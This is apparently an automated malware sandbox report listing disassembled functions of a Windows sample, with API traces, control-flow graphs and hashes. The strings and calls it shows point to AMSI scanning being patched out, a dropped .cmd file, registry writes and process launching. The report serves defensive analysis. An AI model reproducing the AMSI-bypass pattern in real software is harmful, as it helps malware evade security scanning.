                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02907380,0289EF4C,OpenSession,02907380,0289EF4C,UacScan,02907380,0289EF4C,ScanBuffer,02907380,0289EF4C,OpenSession,02907380), ref: 0289ED6E
                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02907380,0289EF4C,OpenSession,02907380,0289EF4C,UacScan,02907380,0289EF4C,ScanBuffer,02907380,0289EF4C,OpenSession), ref: 0289ED76
                                                                            • CloseHandle.KERNEL32(00000BF8,00000000,00000000,000000FF,ScanString,02907380,0289EF4C,OpenSession,02907380,0289EF4C,UacScan,02907380,0289EF4C,ScanBuffer,02907380,0289EF4C), ref: 0289ED7F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                            • String ID: )"C:\Users\Public\Libraries\rlyzsazB.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                            • API String ID: 3475578485-3692822684
                                                                            • Opcode ID: d32ee8540af80b3430bf3409d6735b1768bf75d2545b71d4006e96722019deb0
                                                                            • Instruction ID: 9edcfc509e4fe9e3b22ec31fc12d8b56a045ae9e24c7738a646853ad271568f5
                                                                            • Opcode Fuzzy Hash: d32ee8540af80b3430bf3409d6735b1768bf75d2545b71d4006e96722019deb0
                                                                            • Instruction Fuzzy Hash: 5822EC3DA0015E9FEF50FB68D881B8EB7B6AF85700F1440E2A004EB655EB74AE458F57
                                                                            Function 02881724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 12366 2881724-2881736 12367 2881968-288196d 12366->12367 12368 288173c-288174c 12366->12368 12371 2881a80-2881a83 12367->12371 12372 2881973-2881984 12367->12372 12369 288174e-288175b 12368->12369 12370 28817a4-28817ad 12368->12370 12375 288175d-288176a 12369->12375 12376 2881774-2881780 12369->12376 12370->12369 12379 28817af-28817bb 12370->12379 12373 2881a89-2881a8b 12371->12373 12374 2881684-28816ad VirtualAlloc 12371->12374 12377 2881938-2881945 12372->12377 12378 2881986-28819a2 12372->12378 12385 28816df-28816e5 12374->12385 12386 28816af-28816dc call 2881644 12374->12386 12380 288176c-2881770 12375->12380 12381 2881794-28817a1 12375->12381 12383 28817f0-28817f9 12376->12383 12384 2881782-2881790 12376->12384 12377->12378 12382 2881947-288195b Sleep 12377->12382 12387 28819b0-28819bf 12378->12387 12388 28819a4-28819ac 12378->12388 12379->12369 12389 28817bd-28817c9 12379->12389 12382->12378 12395 288195d-2881964 Sleep 12382->12395 12393 28817fb-2881808 12383->12393 12394 288182c-2881836 12383->12394 12386->12385 12390 28819d8-28819e0 12387->12390 12391 28819c1-28819d5 12387->12391 12397 2881a0c-2881a22 12388->12397 12389->12369 12392 28817cb-28817de Sleep 12389->12392 12400 28819fc-28819fe call 28815cc 12390->12400 12401 28819e2-28819fa 12390->12401 12391->12397 12392->12369 12399 28817e4-28817eb Sleep 12392->12399 12393->12394 12402 288180a-288181e Sleep 12393->12402 12403 28818a8-28818b4 12394->12403 12404 2881838-2881863 12394->12404 12395->12377 12405 2881a3b-2881a47 12397->12405 12406 2881a24-2881a32 12397->12406 12399->12370 12407 2881a03-2881a0b 12400->12407 12401->12407 12402->12394 12409 2881820-2881827 Sleep 12402->12409 12415 28818dc-28818eb call 28815cc 12403->12415 12416 28818b6-28818c8 12403->12416 12410 288187c-288188a 12404->12410 12411 2881865-2881873 12404->12411 12413 2881a68 12405->12413 12414 2881a49-2881a5c 12405->12414 12406->12405 12412 2881a34 12406->12412 12409->12393 12421 28818f8 12410->12421 12422 288188c-28818a6 call 2881500 12410->12422 12411->12410 12420 2881875 12411->12420 12412->12405 12423 2881a6d-2881a7f 12413->12423 12414->12423 12424 2881a5e-2881a63 call 2881500 12414->12424 12425 28818fd-2881936 12415->12425 12429 28818ed-28818f7 12415->12429 12417 28818ca 12416->12417 12418 28818cc-28818da 12416->12418 12417->12418 12418->12425 12420->12410 12421->12425 12422->12425 12424->12423
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,02881FC1), ref: 028817D0
                                                                            • Sleep.KERNEL32(0000000A,00000000,?,02881FC1), ref: 028817E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 27994fa39659134bb2396ecdf6de2f0edd4f3a42ec8522f4a17ed2392e9f7384
                                                                            • Instruction ID: fde3dd6d73d0fff800443d23d9dc029b8fdf6ea530edde0b27fbe01eeae4a645
                                                                            • Opcode Fuzzy Hash: 27994fa39659134bb2396ecdf6de2f0edd4f3a42ec8522f4a17ed2392e9f7384
                                                                            • Instruction Fuzzy Hash: 64B1337EA052458FCB15EF2CD8C8325BBE1EB85315F0986ADD54DCB389CB30A462CB91
                                                                            Function 028988B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(amsi), ref: 028988C1
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02898920
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                            • String ID: DllGetClassObject$W$amsi
                                                                            • API String ID: 941070894-2671292670
                                                                            • Opcode ID: 65e204762731c7213398d2eef654dd922ef971491efd381d7981cd6f9fca815f
                                                                            • Instruction ID: 9a5cf80c4c9737c1477c78d8e318db0445ec12edcaec538003c275367d11080d
                                                                            • Opcode Fuzzy Hash: 65e204762731c7213398d2eef654dd922ef971491efd381d7981cd6f9fca815f
                                                                            • Instruction Fuzzy Hash: 13F0A4A854C381BEE700E2788C45F4FBECD4B62264F088A18B1E8DA2D2D679D1048767
                                                                            Function 02881A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 12454 2881a8c-2881a9b 12455 2881b6c-2881b6f 12454->12455 12456 2881aa1-2881aa5 12454->12456 12457 2881c5c-2881c60 12455->12457 12458 2881b75-2881b7f 12455->12458 12459 2881b08-2881b11 12456->12459 12460 2881aa7-2881aae 12456->12460 12466 28816e8-288170b call 2881644 VirtualFree 12457->12466 12467 2881c66-2881c6b 12457->12467 12462 2881b3c-2881b49 12458->12462 12463 2881b81-2881b8d 12458->12463 12459->12460 12461 2881b13-2881b27 Sleep 12459->12461 12464 2881adc-2881ade 12460->12464 12465 2881ab0-2881abb 12460->12465 12461->12460 12468 2881b2d-2881b38 Sleep 12461->12468 12462->12463 12469 2881b4b-2881b5f Sleep 12462->12469 12471 2881b8f-2881b92 12463->12471 12472 2881bc4-2881bd2 12463->12472 12475 2881ae0-2881af1 12464->12475 12476 2881af3 12464->12476 12473 2881abd-2881ac2 12465->12473 12474 2881ac4-2881ad9 12465->12474 12483 288170d-2881714 12466->12483 12484 2881716 12466->12484 12468->12459 12469->12463 12480 2881b61-2881b68 Sleep 12469->12480 12479 2881b96-2881b9a 12471->12479 12478 2881bd4-2881bd9 call 28814c0 12472->12478 12472->12479 12475->12476 12477 2881af6-2881b03 12475->12477 12476->12477 12477->12458 12478->12479 12485 2881bdc-2881be9 12479->12485 12486 2881b9c-2881ba2 12479->12486 12480->12462 12489 2881719-2881723 12483->12489 12484->12489 12485->12486 12488 2881beb-2881bf2 call 28814c0 12485->12488 12490 2881bf4-2881bfe 12486->12490 12491 2881ba4-2881bc2 call 2881500 12486->12491 12488->12486 12493 2881c2c-2881c59 call 2881560 12490->12493 12494 2881c00-2881c28 VirtualFree 12490->12494
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,02881FE4), ref: 02881B17
                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02881FE4), ref: 02881B31
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 768c7886af5f5004e602483883b882987819b4ba629de32a504cee76c8cffae3
                                                                            • Instruction ID: ff62cdbccad29690d409e2c508c55aedbc3609089ad8139d93da700678a6fd4a
                                                                            • Opcode Fuzzy Hash: 768c7886af5f5004e602483883b882987819b4ba629de32a504cee76c8cffae3
                                                                            • Instruction Fuzzy Hash: CD51227D6042408FD715EF6CC9C8766BBE4AF46318F1885AED54CCB286EB70D846CB92
                                                                            Function 0289E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0289E5F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CheckConnectionInternet
                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                            • API String ID: 3847983778-3852638603
                                                                            • Opcode ID: 643d1f16b219a1c076c1d2d184a227f04de0351d40a6cb413758429fa47a2ef0
                                                                            • Instruction ID: bdad91cd670530ece60288fa8cbad5ef476e2977af199f9aff9a17893ced106e
                                                                            • Opcode Fuzzy Hash: 643d1f16b219a1c076c1d2d184a227f04de0351d40a6cb413758429fa47a2ef0
                                                                            • Instruction Fuzzy Hash: 50410F3EB0010DABEF11FBA8D841ADE77BAEF88700F144466E041E7652EA75AD05CF56
                                                                            Function 02898788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02898814
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                            • String ID: CreateProcessAsUserW$Kernel32
                                                                            • API String ID: 3130163322-2353454454
                                                                            • Opcode ID: eebe99d9c638d123fd204e8677ff9d02bb100413c7cd47ee26b035a42e5d65ad
                                                                            • Instruction ID: bb21aa8e4fec1b53636b69d669adc9c789323bf4d244ff9c91b99d49b56161d7
                                                                            • Opcode Fuzzy Hash: eebe99d9c638d123fd204e8677ff9d02bb100413c7cd47ee26b035a42e5d65ad
                                                                            • Instruction Fuzzy Hash: 2F11C2BA644249AFEB40EFACDC81F9A77EDEB0D750F554450BA08E3640D634F9108B25
                                                                            Function 028985BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • WinExec.KERNEL32(?,?), ref: 02898624
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$Exec
                                                                            • String ID: Kernel32$WinExec
                                                                            • API String ID: 2292790416-3609268280
                                                                            • Opcode ID: 4b62fab746f1aaff07f5088ce48fa00819a19f1cd257d122386b15b28d58f5e8
                                                                            • Instruction ID: 19596d76899d613f22588a86cdf25a07721d9c53312a9bd3e5d482b547d8a02e
                                                                            • Opcode Fuzzy Hash: 4b62fab746f1aaff07f5088ce48fa00819a19f1cd257d122386b15b28d58f5e8
                                                                            • Instruction Fuzzy Hash: F4016D7D68420ABFEB11EAE8EC45B6E77E9EB0A710F504460B900D6640E674BD108A26
                                                                            Function 028985BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • WinExec.KERNEL32(?,?), ref: 02898624
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$Exec
                                                                            • String ID: Kernel32$WinExec
                                                                            • API String ID: 2292790416-3609268280
                                                                            • Opcode ID: 226bfd77ec3c2bc11848353285ff331f242d90310e06488a3ee1e8edb6faf154
                                                                            • Instruction ID: 5daa6105d1368275c4add68509ae4b0eff62558b8b9cd3b4eec445186cc353c6
                                                                            • Opcode Fuzzy Hash: 226bfd77ec3c2bc11848353285ff331f242d90310e06488a3ee1e8edb6faf154
                                                                            • Instruction Fuzzy Hash: 0EF0817D68430ABFEF11EBE8EC45F5E77EDEB0A710F504460B900D6640E674BD108A26
                                                                            Function 02895C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02895D74,?,?,02893900,00000001), ref: 02895C88
                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02895D74,?,?,02893900,00000001), ref: 02895CB6
                                                                              • Part of subcall function 02887D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02893900,02895CF6,00000000,02895D74,?,?,02893900), ref: 02887DAA
                                                                              • Part of subcall function 02887F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02893900,02895D11,00000000,02895D74,?,?,02893900,00000001), ref: 02887FB7
                                                                            • GetLastError.KERNEL32(00000000,02895D74,?,?,02893900,00000001), ref: 02895D1B
                                                                              • Part of subcall function 0288A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0288C3D9,00000000,0288C433), ref: 0288A797
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                            • String ID:
                                                                            • API String ID: 503785936-0
                                                                            • Opcode ID: 503b54062240cade9eaeb78735991118cd60eb912fdb3cf9f887bb9a9eb7bff3
                                                                            • Instruction ID: 89db2a42be33b51a8068313a85907bc3ec6ac731b6462d06ad59c9e413d1bdb8
                                                                            • Opcode Fuzzy Hash: 503b54062240cade9eaeb78735991118cd60eb912fdb3cf9f887bb9a9eb7bff3
                                                                            • Instruction Fuzzy Hash: 5131807CA006099FDB01FFACC881B9EB7F6AB48700F944065E504EB390E7795E048FA2
                                                                            Function 0289F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,029FBA58), ref: 0289F258
                                                                            • RegSetValueExA.ADVAPI32(00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F290
                                                                            • RegCloseKey.ADVAPI32(00000BE4,00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F29B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenValue
                                                                            • String ID:
                                                                            • API String ID: 779948276-0
                                                                            • Opcode ID: 7a4a48c2124d0558dc4a7bc889a33e55b6007d79c196d777439a8056e5d68a05
                                                                            • Instruction ID: 0b70b02decf0d531184c8f45d885ff34f2d18e18cbafcd0100d28163e3ca1269
                                                                            • Opcode Fuzzy Hash: 7a4a48c2124d0558dc4a7bc889a33e55b6007d79c196d777439a8056e5d68a05
                                                                            • Instruction Fuzzy Hash: C411FB7E644205AFEB50FFA8DC91E9D7BEDEB08700B4044A1B604D7650EB30EE408F55
                                                                            Function 0289F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,029FBA58), ref: 0289F258
                                                                            • RegSetValueExA.ADVAPI32(00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F290
                                                                            • RegCloseKey.ADVAPI32(00000BE4,00000BE4,00000000,00000000,00000001,00000000,0000001C,00000000,0289F2C3), ref: 0289F29B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenValue
                                                                            • String ID:
                                                                            • API String ID: 779948276-0
                                                                            • Opcode ID: 00c8e185fd996d0d30027889b3b905bff0149a619d4f97fab26d852795d68e06
                                                                            • Instruction ID: 62588c0e58a1b0a1a88f33a4860064cfc98a219df23cdfba7ff9e8b73311ed60
                                                                            • Opcode Fuzzy Hash: 00c8e185fd996d0d30027889b3b905bff0149a619d4f97fab26d852795d68e06
                                                                            • Instruction Fuzzy Hash: 4E110D7E644205AFDB50FFA8DC91E9D7BEDEB08700B4044A1B604D7650EB30EE408F55
                                                                            Function 0288E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
